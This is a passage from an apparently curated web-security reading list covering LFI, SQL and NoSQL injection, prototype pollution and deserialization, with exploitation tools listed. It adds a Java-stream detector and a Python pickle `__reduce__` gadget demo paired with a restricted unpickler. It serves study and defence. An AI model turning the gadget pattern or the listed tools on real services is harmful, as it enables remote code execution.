- This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities. While using /proc for such an aim is well known, this one is a specific technique that had not been previously published as far as we know. A tool to automatically exploit LFI using the shown approach is released accordingly.
- Local File Inclusion (LFI) of session files to root escalation - ush.it(2008)
- Windows Blind Files Collection - 0xsp
- Tools
- dotdotpwn
- Liffy
- Liffy is a Local File Inclusion Exploitation tool.
- lfi-labs
- small set of PHP scripts to practice exploiting LFI, RFI and CMD injection vulns
- psychoPATH - LFI
- This tool is a highly configurable payload generator detecting LFI & web root file uploads. Involves advanced path traversal evasive techniques, dynamic web root list generation, output encoding, site map-searching payload generator, LFI mode, nix & windows support plus single byte generator.
- Kadimus
- Kadimus is a tool to check sites for LFI vulnerabilities and also exploit them.
- lfipwn
- LFISuite
- General
- pentesterland/Log4Shell
- Log4J infodump by Pentesterland
- 101
- NT Web Technology Vulnerabilities - rain.forest.puppy
- First public writeup of SQLi
- "How I hacked PacketStorm" - rain forest puppy
- SQL injection - PortSwigger
- Basic of SQL for SQL Injection - SecurityIdiots
- How to exploit the SQL Injection Attack - sqlzoo
- UNLEASH THE POWER OF SQL INJECTION! | Beginners Guide to Hacking with SQLi - SecAura
- Reference
- General Articles/Blogposts/Writeups
- Finding SQL injections fast with white-box analysis — a recent bug example - Frycos
- Blind (time-based) SQLi - Bug Bounty - jspin.re
- Exploiting difficult SQL injection vulnerabilities using sqlmap: Part 1 - Stephen Bradshaw(2017)
- SELECT code_execution FROM * USING SQLite; Gaining code execution using a malicious SQLite database - Omer Gull(2019)
- Beyond SQLi: Obfuscate and Bypass - CWH Underground
- Second Order SQLI: Automating with sqlmap - Jorge Lajara(2019)
- BigQuery SQL Injection Cheat Sheet - Ozgur Alp(2020)
- How to fuzz MySQL looking for weird characters - Luca Di Domenico(2020)
- Don't fear the bark, ts_rewrite to dodge the mark - Gaetan Ferry(2020)
- Advanced boolean-based SQLi filter bypass techniques - theMiddle(2020)
- Hunting for SQL injections (SQLis) and Cross-Site Request Forgeries (CSRFs) in WordPress Plugins - Alex Pena(2020)
- Automating Blind Sql Injection - Bad_Jubies(2020)
- SQL Injection filter bypass to perform blind SQL Injection - mannulinux.org(2020)
- SQLMap: One time use CSRF tokens - itsahobby(2022)
- Database Schema (Injection) - Hacksplained
- kleiton0x00/Advanced SQL Injection Cheatsheet
- A cheat sheet that contains advanced queries for SQL Injection of all types.
- SQL Injection Is Still Alive: From a Mall's Interactive Terminal to AWS WAF Bypass - Marc Olivier
- Tortellini in Brodobuf: How serializing data using Google’s Protobuf is not protecting your web app. - Oblio, MrSaighnal(2021)
- "Many developers believe that serializing traffic makes a web application more secure, as well as faster. That would be easy, right? The truth is that security implications remain if the backend code does not adopt adequate defensive measures, regardless of how data is exchanged between the client and server. In this article we will show you how the serialization can’t stop an attacker if the web application is vulnerable at the root. During our activity the application was vulnerable to SQL injection, we will show how to exploit it in case the communications are serialized with Protocol Buffer and how to write a SQLMap tamper for it."
- Finding an unseen SQL Injection by bypassing escape functions in mysqljs/mysql - Flatt Security(2022)
- How I Found Multiple SQL Injections in 5 Minutes in Bug Bounty - Omar Hashem(2022)
- SQL Injection - PayloadsAllTheThings
- Papers
- Talks/Presentations/Videos
- Writeups
- Training
- SQLi Lab lessons
- SQLI-LABS is a platform to learn SQLI
- Out-of-Band
- Out-of-Band (OOB) SQL Injection - Lee Chun How(2019)
- A Study of Out-of-Band Structured Query Language Injection - Lee Chun How(2019)
- "Out-of-Band (OOB) Structured Query Language (SQL) Injection is an exploitation to exfiltrate data from a database through a different outbound channel. Common channels used by OOB SQL Injection for data exfiltration are the Domain Name Server (DNS) and HyperText Transfer Protocol (HTTP) channels. This type of SQL injection should be addressed properly because its impact is on a par with traditional methods. OOB SQL Injection impacts database systems with insufficient input validation controls in place that allow public access over either the DNS or HTTP protocol. Test cases and recommendations for remediation are discussed in this paper in order to raise awareness of the exploitation."
- NoSQL
- Articles/Blogposts/Writeups
- NoSQL Injection in Modern Web Applications - petecorey.com
- N1QL Injection: Kind of SQL Injection in a NoSQL Database - Krzysztof Pranczk(2020)
- nosqli
- NoSql Injection CLI tool, for finding vulnerable websites using MongoDB.
- NoSql Injection Cheatsheet - Nullsweep
- MeteorJS
- MongoDB
- Neo4j
- Talks/Presentations/Videos
- Making Mongo Cry-Attacking NoSQL for Pen Testers - Russell Butturrini(Derbycon2014)
- NoSQL databases continue to grow in popularity due to their scalability, dynamic data structures, ease of development and cloud readiness. As these types of databases become more prevalent, penetration testers need to understand how these databases work, how applications interact with them, and where the inherent weaknesses of NoSQL databases are. This presentation is targeted towards penetration testers and putting the theoretical attacks researchers have discussed into practice during a penetration testing engagement. It will discuss weaknesses with a particular focus on MongoDB and how to quickly and easily exploit them as well as where the high value targets in the system are post exploitation. NoSQLMap, a Python tool written for automatically stealing data from NoSQL database servers and web applications, will also be demoed.
- Abusing NoSQL Databases - Ming Chow
- Slides
- The days of selecting from a few SQL database options for an application are over. There is now a plethora of NoSQL database options to choose from: some are better than others for certain jobs. There are good reasons why developers are choosing them over traditional SQL databases including performance, scalability, and ease-of-use. Unfortunately, like for many hot technologies, security is largely an afterthought in NoSQL databases. This short but concise presentation will illustrate how poor the quality of security in many NoSQL database systems is. This presentation will not be confined to one particular NoSQL database system. Two sets of security issues will be discussed: those that affect all NoSQL database systems such as defaults, authentication, encryption; and those that affect specific NoSQL database systems such as MongoDB and CouchDB. The ideas that we now have a complicated heterogeneous problem and that defense-in-depth is even more necessary will be stressed. There is a common misconception that SQL injection attacks are eliminated by using a NoSQL database system. While specifically SQL injection is largely eliminated, injection attack vectors have increased thanks to JavaScript and the flexibility of NoSQL databases. This presentation will present and demo new classes of injection attacks. Attendees should be familiar with JavaScript and JSON.
- Papers
- No SQL, No Injection? - Examining NoSQL Security - Aviv Ron, Alexandra Shulman-Peleg, Emanuel Bronshtein
- NoSQL data storage systems have become very popular due to their scalability and ease of use. This paper examines the maturity of security measures for NoSQL databases, addressing their new query and access mechanisms. For example, the emergence of new query formats makes the old SQL injection techniques irrelevant, but are NoSQL databases immune to injection in general? The answer is NO. Here we present a few techniques for attacking NoSQL databases such as injections and CSRF. We analyze the source of these vulnerabilities and present methodologies to mitigate the attacks. We show that this new vibrant technological area lacks the security measures and awareness which have developed over the years in traditional RDBMS/SQL systems.
- Tools
- Nosql-Exploitation-Framework
- A framework for NoSQL scanning and exploitation.
- NoSQL Injector
- NoSQL scanner and injector.
- Articles/Blogposts/Writeups
- DB2
- MongoDB
- 101
- Tools
- mongoaudit
- mongoaudit is a CLI tool for auditing MongoDB servers, detecting poor security settings and performing automated penetration testing.
- mongot
- mongot makes it easy to extract data from open MongoDB's. By specifying an IP/port with the -d/-p parameters, mongot will connect to an open MongoDB, display any identified database names, collections, and a small sample of data in each.
- MS-SQL
- MySQL
- 101
- Articles/Blogposts/Writeups
- Oracle SQL
- 101
- Articles/Blogposts/Writeups
- PostgreSQL
- 101
- Articles/Blogposts/Writeups
- PostgreSQL Pass The Hash protocol design weakness
- Ultimate Guide: PostgreSQL Pentesting - Shlok Yadav(2020)
- A Penetration Tester’s Guide to PostgreSQL - David Hayter(2017)
- Attacking Dell Foglight Server - infosecaddicts.com(2017)
- Postgres “unsupported frontend protocol” mystery - Greg Sabino Mullane(2015)
- SQL Injection Double Uppercut :: How to Achieve Remote Code Execution Against PostgreSQL - Steven Seeley
- Ruby on Rails(ActiveRecord)
- Tools
- sqlmap
- jSQL Injection
- jSQL Injection is a Java application for automatic SQL database injection.
- Laudanum
- “Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments. They provide functionality such as shell, DNS query, LDAP retrieval and others.”
- GraFScaN
- Albatar
- Albatar is a SQLi exploitation framework in Python
- Sample Databases
- Databases with sample data for testing
- 101
- Articles/Blogposts/Writeups
- Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - soffensive
- RCE using Path Traversal - inc0gbyt3
- Zip Slip Vulnerability - snyk.io
- Targeting a macOS Application? Update Your Path Traversal Lists - James Sebree
- The Path for Testing Path Traversal Vulnerabilities with Python - Mazin Ahmed(2020)
- Practical Client Side Path Traversal Attacks - mr medi(2022)
- Tools
- dotdotpwn
- It's a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc.
- 101
- Maintainable JavaScript: Don’t modify objects you don’t own - Nicholas C. Zakas
- What is Prototype Pollution? - Changhui Xu
- What is prototype pollution and why is it such a big deal? - Dani Akash
- JavaScript Prototype Pollution - Part 1 - HTTPVoid(2020)
- Prototype pollution: The dangerous and underrated vulnerability impacting JavaScript applications - Ben Dickson(2021)
- New ways to alert: prototype pollution - Sergey Bobrov, Nikita Stupin(2021)
- The Complete Guide to Prototype Pollution Vulnerabilities - Daniel Elkabes(2021)
- What is prototype poisoning? Prototype bugs explained! - Anton Linné, Christoffer Jerkeby(2022)
- Prototype Pollution in Python - abdulrah33m(2023)
- Client-Side
- Client-Side Prototype Pollution
- "In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to document.location parsing and useful script gadgets that can be used to demonstrate the impact."
- JavaScript
- Articles/Blogposts/Writeups
- Prototype Pollution Affecting jquery package, versions <3.4.0 - snyk.io
- After three years of silence, a new jQuery prototype pollution vulnerability emerges once again - Liran Tal
- Prototype pollution attack (lodash) - holyvier
- Inheritance and the prototype chain - MozillaDevNetwork
- Prototype pollution attack through jQuery $.extend - Asger Feldthaus(HackerOne)
- Analysis and Exploitation of Prototype Pollution attacks on NodeJs - Nullcon HackIM CTF web 500 writeup - Anirudh Anand
- Prototype Pollution - Michal Bentkowski
- Exploiting prototype pollution – RCE in Kibana (CVE-2019-7609) - Michal Bentkowski
- Prototype pollution – and bypassing client-side HTML sanitizers - Michał Bentkowski(2020)
- "A tale of making internet pollution free"- Exploiting Client-Side Prototype Pollution in the wild - s1r1us
- AST Injection, Prototype Pollution to RCE - POSIX(2020)
- This article describes how to trigger RCE in two well-known template engines, using a new technique called AST Injection.
- Hunting for Prototype Pollution and its vulnerable code on JS libraries - kleiton0x7e(2021)
- Python
- Prototype Pollution in Flask - lanmaster53(2023)
- Server side prototype pollution, how to detect and exploit - yeswehack
- Hit the Ground Running with Prototype Pollution - Isaac Burton(2023)
- Detecting Server-Side Prototype Pollution - Daniel Thatcher(2023)
- Server-side prototype pollution: Black-box detection without the DoS - Gareth Heyes(2023)
- EJS - Server Side Prototype Pollution gadgets to RCE -
- Articles/Blogposts/Writeups
- Presentations, Talks, Videos
- Prototype pollution attack - HoLyVieR
- Hacking Modern Web Apps with RCE and Prototype Pollution - Abraham Aranguren(2020)
- Very creative way to turn Prototype Pollution into RCE in kibana - Bug Bounty Reports Explained - gregxsunday(2020)
- This video is an explanation of prototype pollution vulnerability in kibana that, in a super cool and very creative way, was used to achieve remote code execution in kibana software.
- Prototype Pollution Attack in NodeJS Application - Olivier Arteau(NorthSec18)
- Prototype Pollution Attack Explained - CyberSecurityTV
- Parameter pollution is a very old attack; however, I feel like it is underrated. 20+ JS libraries were vulnerable to this attack including JQuery. This is an important attack to learn for any web application pentester. Few automated tools can detect this; however, it does require manual inspection.
- Using Chromedp to Hunt for Prototype Pollution - @TomNomNomDotCom(NahamCon2021)
- Prototype pollution is fairly well known, but being a client-side issue it can be difficult to look for at scale. Let's write a bit of Go using the chromedp package to solve that problem!
- Papers
- Silent Spring: Prototype Pollution Leads to Remote Code Execution in Node.js - Mikhail Shcherbakov, Musard Balliu, Cristian-Alexandru Staicu(2022)
- In this paper, we set out to study the problem in a holistic way, from the detection of prototype pollution to detection of gadgets, with the ambitious goal of finding end-to-end exploits beyond DoS, in full-fledged Node.js applications. We build the first multi-staged framework that uses multi-label static taint analysis to identify prototype pollution in Node.js libraries and applications, as well as a hybrid approach to detect universal gadgets, notably, by analyzing the Node.js source code. We implement our framework on top of GitHub’s static analysis framework CodeQL to find 11 universal gadgets in core Node.js APIs, leading to code execution. Furthermore, we use our methodology in a study of 15 popular Node.js applications to identify prototype pollutions and gadgets. We manually exploit eight RCE vulnerabilities in three high-profile applications such as NPM CLI, Parse Server, and Rocket.Chat. Our results provide alarming evidence that prototype pollution in combination with powerful universal gadgets leads to RCE in Node.js.
- Tools
- client-side-prototype-pollution
- "In this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to document.location parsing and useful script gadgets that can be used to demonstrate the impact."
- PPScan
- Client Side Prototype Pollution Scanner
- protoscan
- Prototype Pollution Scanner made in Golang, it was actually made by @tomnomnom in NahamCon2021
- 101
- Articles/Blogposts/Writeups
- Tools
- Talks/Presentations/Videos
- Reflected File Download - A New Web Attack Vector - BHEU 2014
- Skip to 19:24 for technical content
- Paper
- 101
- Relative Path Overwrite Explanation/Writeup
- RPO (Relative Path Overwrite) is a technique to take advantage of relative URLs by overwriting their target file. To understand the technique we must first look into the differences between relative and absolute URLs. An absolute URL is basically the full URL for a destination address including the protocol and domain name whereas a relative URL doesn’t specify a domain or protocol and uses the existing destination to determine the protocol and domain.
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Papers
- Understanding and Mitigating the Security Risks of Content Inclusion in Web Browsers - Sajjad Arshad(2020)
- In this thesis, I propose novel research into understanding and mitigating the security risks of content inclusion in web browsers to protect website publishers as well as their users. First, I introduce an in-browser approach called Excision to automatically detect and block malicious third-party content inclusions as web pages are loaded into the user’s browser or during the execution of browser extensions. Then, I propose OriginTracer, an in-browser approach to highlight extension-based content modification of web pages. Finally, I present the first in-depth study of style injection vulnerability using RPO and discuss potential countermeasures.
- General
- Tools
- Miscellaneous
- 101
- General
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
- Pentesting J2EE - Marc Schönefeld(BlackHat 2006)
- History of Deserialization: RCE for the modern web applications - Philippe Arteau(2019)
- Friday the 13th JSON Attacks - Alvaro Muñoz, Oleksandr Mirosh(BHUSA17)
- "In this paper, we will focus on JSON libraries and we will analyze which ones could allow arbitrary code execution upon deserialization of untrusted data. We will also have a look at .NET world by reviewing existing research on this field and completing it with updated list of vulnerable formatters and proof of concept gadgets to attack them. To finish, we will extend the research on JSON serialization libraries and .NET formatters into any serialization format available. We will provide guidance to find out whether it could be attacked and how to attack it. Where possible, we will also provide mitigation advice to help avoid vulnerable configurations that could turn your serialization library vulnerable."
- Json Deserialization Exploitation: RCE by Design - ?(2018)
- Java
- 101
- Articles/Blogposts/Writeups
- Java Deserialization Security FAQ - christian-schneider.net
- Detecting deserialization bugs with DNS exfiltration - Philippe Arteau(2017)
- Reliable discovery and Exploitation of Java Deserialization vulns(2017)
- What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability. - breenmachine(2015)
- Fastjson: exceptional deserialization vulnerabilities - Peter Stockli(2020)
- Liferay Portal JSON Web Service RCE Vulnerabilities - Markus Wulftange(2020)
- Deserialized Double Dirty - John Skipper(2018)
- Testing and exploiting Java Deserialization in 2021 - AFINE(2021)
- Jackson gadgets - Anatomy of a vulnerability - Andrea Brancaleoni(2019)
- Unexpected Deserialization pt.1 - JMS - SilentSignal(2021)
- Demystifying Insecure Deserialisation on JSF Application - Dhiyaneshwaran(2021)
- Finding gadgets like it's 2015: part 1 - Hugo Vincent(2021)
- Finding gadgets like it's 2022 - Hugo Vincent(2022)
- General
- Java-Deserialization-Cheat-Sheet
- A cheat sheet for pentesters about Java Native Binary Deserialization vulnerabilities
- Presentations/Talks/Videos
- Marshalling Pickles - Chris Frohoff, Gabe Lawrence(AppSecCali 2015)
- Slides
- Object serialization technologies allow programs to easily convert in-memory objects to and from various binary and textual data formats for storage or transfer – but with great power comes great responsibility, because deserializing objects from untrusted data can ruin your day. We will look at historical and modern vulnerabilities across different languages and serialization technologies, including Python, Ruby, and Java, and show how to exploit these issues to achieve code execution. We will also cover some strategies to protect applications from these types of attacks.
- Exploiting Deserialization Vulnerabilities in Java - Matthias Kaiser(2015)
- Deserialization vulnerabilities in Java are lesser known and exploited (compared to unserialize() in PHP). This talk will give insights how this bug class can be turned into serverside Remote Code Execution. Details and a demo will be given for one of my patched vulnerabilities (CVE-2015-6576, Atlassian Bamboo RCE).
- Deserialize My Shorts Or How I Learned to Start Worrying and Hate Java Object Deserialization - Chris Frohoff, Gabe Lawrence
- Slides
- Object deserialization is an established but poorly understood attack vector in applications that is disturbingly prevalent across many languages, platforms, formats, and libraries. In January 2015 at AppSec California, Chris Frohoff and Gabe Lawrence gave a talk on this topic, covering deserialization vulnerabilities across platforms, the many forms they take, and places they can be found. It covered, among other things, somewhat novel techniques using classes in commonly used libraries for attacking Java serialization that were subsequently released in the form of the ysoserial tool. Few people noticed until late 2015, when other researchers used these techniques/tools to exploit well known products such as Bamboo, WebLogic, WebSphere, ApacheMQ, and Jenkins, and then services such as PayPal. Since then, the topic has gotten some long-overdue attention and great work is being done by many to improve our understanding and developer awareness on the subject. This talk will review the details of Java deserialization exploit techniques and mitigations, as well as report on some of the recent (and future) activity in this area.
- Automated Discovery of Deserialization Gadget Chains - Ian Haken(Defcon26)
- In-Memory Data Grid Applications: Finding Common Java Deserialization Vulnerabilities with CodeQL - Man Yue Mo(2019)
- [Pwning Your Java Messaging With Deserialization Vulnerabilities - Matthias Kaiser(BHUSA2016)](https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities.pdf)
- Oracle Java Deserialization Vulnerabilities - Stephen Kost, Phil Reimann(2016)
- Java deserialization is a class of security vulnerabilities that can result in server-side remote code execution (RCE). As many Oracle products are based on Java, deserialization bugs are found in many Oracle environments especially those using Oracle WebLogic, Oracle Fusion Middleware, and Oracle E-Business Suite. As an example, in November 2015 Oracle released an out-of-cycle security fix (CVE-2015-4852) in order to fix a deserialization bug in Oracle WebLogic. This education webinar provides an understanding of Java deserialization vulnerabilities, the potential impact for Oracle environments, and strategies to protect an Oracle environment from this class of security vulnerabilities.
- Defending against Java Deserialization Vulnerabilities - Luca Carettoni(2016)
- Java Serialization security issues - Erno Jeges - OWASP Bay Area(2018)
- In this short talk, we'll take a look at the various security issues coming from deserializing untrusted data in Java: information disclosure, denial of service, and even code execution. We'll examine these issues through live demonstrations with step-by-step explanations of what can go wrong – and how. Most importantly, we'll discuss several best practices and countermeasures you can use as a developer to protect yourself from these issues – or prevent them from affecting you in the first place.
- Deserialization: what, how and why [not] - Alexei Kojenov(AppSec USA2018)
- Slides
- Code
- Insecure deserialization was recently added to OWASP's list of the top 10 most critical web application security risks, yet it is by no means a new vulnerability category. For years, data serialization and deserialization have been used in applications, services and frameworks, with many programming languages supporting them natively. Deserialization got more attention recently as a potential vehicle to conduct several types of attacks: data tampering, authentication bypass, privilege escalation, various injections and, ultimately, remote code execution. Two prominent vulnerabilities in Apache Commons and Apache Struts, both allowing remote code execution, also contributed to raising awareness of this risk. We will discuss how data serialization and deserialization are used in software, the dangers of deserializing untrusted input, and how to avoid insecure deserialization vulnerabilities. The presentation will contain several code examples with live demos of bypassing security controls due to incorrect deserialization. The examples and demos will use Java and its native serialization, but the techniques can be extrapolated to other languages and formats.
- New Exploit Technique In Java Deserialization Attack - Yang Zhang, Yongtao Wang, Keyi Li, Kunzhe Chai(BHEU2019)
- In our depth research, we analyzed more than 10000+ Java third-party libraries and found many cases which can be exploited in real-world attack scenarios. In this talk, we will bat around the principle and exploit technique of these vulnerabilities. Also, we will present how to pwn target server by our new exploit technique. It can not only improve the effect of java deserialization vulnerability but also enhance other Java security issues impact, and we will discuss profound impacts of the attack vector in the java security field.
- Papers
- Java Unmarshaller Security - Turning your data into code execution
- This paper presents an analysis, including exploitation details, of various Java open-source marshalling libraries that allow(ed) for unmarshalling of arbitrary, attacker supplied, types and shows that no matter how this process is performed and what implicit constraints are in place it is prone to similar exploitation techniques.
- tool from the above paper: marshalsec
- Tools
- Break Fast Serial
- A proof of concept that demonstrates asynchronous scanning for Java deserialization bugs
- ysoserial
- JMET
- JMET was released at Blackhat USA 2016 and is an outcome of Code White's research effort presented in the talk "Pwning Your Java Messaging With Deserialization Vulnerabilities". The goal of JMET is to make the exploitation of the Java Message Service (JMS) easy. In the talk more than 12 JMS client implementations were shown, vulnerable to deserialization attacks. The specific deserialization vulnerabilities were found in ObjectMessage implementations (classes implementing javax.jms.ObjectMessage).
- GadgetProbe
- GadgetProbe takes a wordlist of Java classes, outputs serialized DNS callback objects, and reports what's lurking in the remote classpath.
- Blogpost
- marshalsec
- Companion tool to the paper "Java Unmarshaller Security - Turning your data into code execution" (see Papers above), covering the Java marshalling libraries analyzed there.
- QLinspector
- Finding Java gadget chains with CodeQL.
- SerializationDumper
- A tool to dump and rebuild Java serialization streams and Java RMI packet contents in a more human readable form. The tool does not deserialize the stream (i.e. objects in the stream are not instantiated), so it does not require access to the classes that were used in the stream*. This tool was developed to support research into Java deserialization vulnerabilities after spending many hours manually decoding raw serialization streams to debug code!
- Exploits
- SerialKiller: Bypass Gadget Collection
- Collection of Bypass Gadgets that can be used in JVM Deserialization Gadget chains to bypass "Look-Ahead ObjectInputStreams" defensive deserialization.
- Serianalyzer
- A static byte code analyzer for Java deserialization gadget research
- Java Deserialization Exploits
- A collection of Java Deserialization Exploits
- Java Deserialization Exploits
- A collection of curated Java Deserialization Exploits
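- Added example (not part of this page, of SerializationDumper or of any other tool listed here): a small Python header parser in the spirit of SerializationDumper, used as a detection check rather than an exploit. It reads only the stream magic and the first class descriptor of a Java serialization stream, never instantiates anything, and scans text such as cookies or proxy log lines for the base64 `rO0AB` prefix. The class name, serialVersionUID and cookie line are constructed for the example; nothing here comes from a real JVM or a real application.

```python
import base64
import re
import struct

# Constants from java.io.ObjectStreamConstants.
STREAM_MAGIC = 0xACED
STREAM_VERSION = 5
TC_NULL = 0x70
TC_CLASSDESC = 0x72
TC_OBJECT = 0x73
TC_ENDBLOCKDATA = 0x78
SC_SERIALIZABLE = 0x02


def _read_utf(buf, pos):
    """Java writeUTF(): 2-byte big-endian length followed by (modified) UTF-8 bytes."""
    (length,) = struct.unpack_from(">H", buf, pos)
    end = pos + 2 + length
    return buf[pos + 2:end].decode("utf-8"), end


def first_class_name(blob):
    """Class name of the outermost object in a Java serialization stream, or None.

    Only the 4-byte header and the first class descriptor are read and nothing is
    instantiated, so this is safe to run on attacker-controlled bytes. Streams whose
    top-level element is not a plain TC_OBJECT/TC_CLASSDESC pair (a bare string,
    an array, a back-reference) return None rather than being guessed at."""
    if len(blob) < 8:
        return None
    magic, version = struct.unpack_from(">HH", blob, 0)
    if magic != STREAM_MAGIC or version != STREAM_VERSION:
        return None
    if blob[4] != TC_OBJECT or blob[5] != TC_CLASSDESC:
        return None
    try:
        name, _ = _read_utf(blob, 6)
    except (struct.error, UnicodeDecodeError):
        return None
    return name


def build_sample_stream(class_name, serial_version_uid=0x1122334455667788):
    """Constructed test vector (not produced by a JVM): the stream a JVM would
    write for a Serializable class with no fields and no superclass, assembled
    from the same constants the parser uses."""
    encoded = class_name.encode("utf-8")
    return (
        struct.pack(">HH", STREAM_MAGIC, STREAM_VERSION)
        + bytes([TC_OBJECT, TC_CLASSDESC])
        + struct.pack(">H", len(encoded)) + encoded
        + struct.pack(">Q", serial_version_uid)
        + bytes([SC_SERIALIZABLE])        # classDescFlags
        + struct.pack(">H", 0)            # field count
        + bytes([TC_ENDBLOCKDATA])        # classAnnotation
        + bytes([TC_NULL])                # superClassDesc: none
    )


# base64 of the header b"\xac\xed\x00\x05" begins with "rO0AB"; the raw header is
# what to look for in binary protocols (RMI, JMS, T3), the prefix in cookies and params.
_B64_RE = re.compile(r"rO0AB[A-Za-z0-9+/=]{8,}")


def scan_for_java_objects(line):
    """Report the leading class of every base64 Java serialization stream in a
    text line (request header, cookie, form field, log entry)."""
    hits = []
    for match in _B64_RE.finditer(line):
        try:
            blob = base64.b64decode(match.group(0), validate=True)
        except ValueError:
            continue
        name = first_class_name(blob)
        if name is not None:
            hits.append(name)
    return hits


# Constructed sample line, as it might appear in a proxy log.
SAMPLE_COOKIE_LINE = (
    "Cookie: JSESSIONID=abc123; state="
    + base64.b64encode(build_sample_stream("com.example.shop.Cart")).decode()
    + "; theme=dark"
)
```

- Finding a serialized object in a cookie or parameter is the trigger to test the endpoint with ysoserial or GadgetProbe; which class leads the stream tells you what the application expects and whether a look-ahead filter (ObjectInputFilter / SerialKiller-style) is likely in front of it.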
- .NET
- Articles/Blogposts/Writeups
- .NET Serialization: Detecting and defending vulnerable endpoints - Alvaro Munoz
- ASP.NET resource files (.RESX) and deserialisation issues - Soroush Dalili
- RCEVIL.NET: A Super Serial Story - Jared McLaren(BSides Iowa2019)
- HITCON 2018: Why so Serials? Write-up - cyku.tw
- HITCON CTF 2018 - Why so Serials? Writeup - Orange
- Talks/Presentations
- .NET Serialization: Detecting and defending vulnerable endpoints - Alvaro Muñoz(LocoMocoSec2018)
- 2016 was the year of Java deserialization apocalypse. Although Java Deserialization attacks were known for years, the publication of the Apache Commons Collection Remote Code Execution gadget (RCE from now on) finally brought this forgotten vulnerability to the spotlight and motivated the community to start finding and fixing these issues. .NET is next in line; formatters such as BinaryFormatter and NetDataContractSerializer are known to share similar mechanics which make them potentially vulnerable to similar RCE attacks. However, as we saw with Java before, the lack of RCE gadgets led some software vendors to not take this issue seriously. In this talk, we will analyze .NET serializers including third party JSON parsers for potential RCE vectors. We will provide real-world examples of vulnerable code and more importantly, we will review how these vulnerabilities were detected and fixed in each case.
- Friday the 13th: Attacking JSON - Alvaro Muñoz & Oleksandr Mirosh(AppSecUSA 2017)
- 2016 was the year of Java deserialization apocalypse. Although Java Deserialization attacks were known for years, the publication of the Apache Commons Collection Remote Code Execution (RCE from now on) gadget finally brought this forgotten vulnerability to the spotlight and motivated the community to start finding and fixing these issues. One of the most suggested solutions for avoiding Java deserialization issues was to move away from Java Deserialization altogether and use safer formats such as JSON. In this talk, we will analyze the most popular JSON parsers in both .NET and Java for potential RCE vectors. We will demonstrate that RCE is also possible in these libraries and present details about the ones that are vulnerable to RCE by default. We will also discuss common configurations that make other libraries vulnerable. In addition to focusing on JSON format, we will generalize the attack techniques to other serialization formats. In particular, we will pay close attention to several serialization formats in .NET. These formats have also been known to be vulnerable since 2012 but the lack of known RCE gadgets led some software vendors to not take this issue seriously. We hope this talk will change this. With the intention of bringing the due attention to this vulnerability class in .NET, we will review the known vulnerable formats, present other formats which we found to be vulnerable as well and conclude presenting several gadgets from system libraries that may be used to achieve RCE in a stable way: no memory corruption -- just simple process invocation. Finally, we will provide recommendations on how to determine if your code is vulnerable, provide remediation advice, and discuss alternative approaches.
- .NET Roulette: Exploiting Insecure Deserialization in Telerik UI - Caleb Gross(DerpCon2020)
- So you're pentesting a .NET application, and you notice the server is deserializing user input—great! You know this is bad in theory, but have no idea how to actually get a shell in time for the engagement. This talk will bring you up to speed on how .NET deserialization works and how to get shells on real applications. In this presentation, we'll dig into the internals of CVE-2019-18935, a deserialization vulnerability that allows RCE on the popular web UI suite Telerik UI for ASP.NET AJAX. After demonstrating how to exploit this issue step-by-step, you'll learn a hands-on approach to debugging a locally running ASP.NET application, quickly assessing the site's attack surface, and examining possible avenues for finding and exploiting insecure uses of deserialization. This talk is intended for penetration testers and security researchers who'd like to begin testing deserialization vulnerabilities in .NET software.
- Papers
- Tools
- YSoSerial.Net
- ysoserial.net is a collection of utilities and property-oriented programming "gadget chains" discovered in common .NET libraries that can, under the right conditions, exploit .NET applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.
- Articles/Blogposts/Writeups
- PHP
- Python
- Articles/Blogposts/Writeups
- Talks
- Marshalling Pickles - Chris Frohoff & Gabriel Lawrence(OWASPAppSec California2015)
- Object serialization technologies allow programs to easily convert in-memory objects to and from various binary and textual data formats for storage or transfer – but with great power comes great responsibility, because deserializing objects from untrusted data can ruin your day. We will look at historical and modern vulnerabilities across different languages and serialization technologies, including Python, Ruby, and Java, and show how to exploit these issues to achieve code execution. We will also cover some strategies to protect applications from these types of attacks.
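- Added example (not from the talk or from this page): the Python side of "Marshalling Pickles" in runnable form. A `__reduce__` gadget makes `pickle.loads` call an arbitrary callable (here the harmless `os.getcwd`, but `os.system` is pickled the same way), a `find_class` allow-list refuses it, and an HMAC envelope keeps foreign streams out in the first place. The key, the session dict and the class names are constructed for the example.

```python
import hashlib
import hmac
import io
import os
import pickle

# --- attacker side -----------------------------------------------------------

class Gadget:
    """__reduce__ tells the unpickler to call an arbitrary callable with
    arbitrary arguments while loading. os.getcwd is used because it is harmless;
    os.system or subprocess.Popen are pickled by reference in exactly the same way."""

    def __reduce__(self):
        return (os.getcwd, ())


def attacker_payload():
    return pickle.dumps(Gadget())


# Recorded so the demonstration can check what the gadget produced.
EXPECTED_GADGET_RESULT = os.getcwd()


# --- vulnerable server side --------------------------------------------------

def vulnerable_load(data):
    """The bug: pickle.loads on bytes the client controls."""
    return pickle.loads(data)


# --- hardened server side ----------------------------------------------------

class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list the globals a stream may reference (the pattern from the pickle
    module documentation). The gadget needs posix.getcwd, so it is refused."""

    ALLOWED = {
        ("builtins", "dict"), ("builtins", "list"), ("builtins", "set"),
        ("builtins", "tuple"), ("builtins", "str"), ("builtins", "int"),
    }

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_load(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def sign(data, key):
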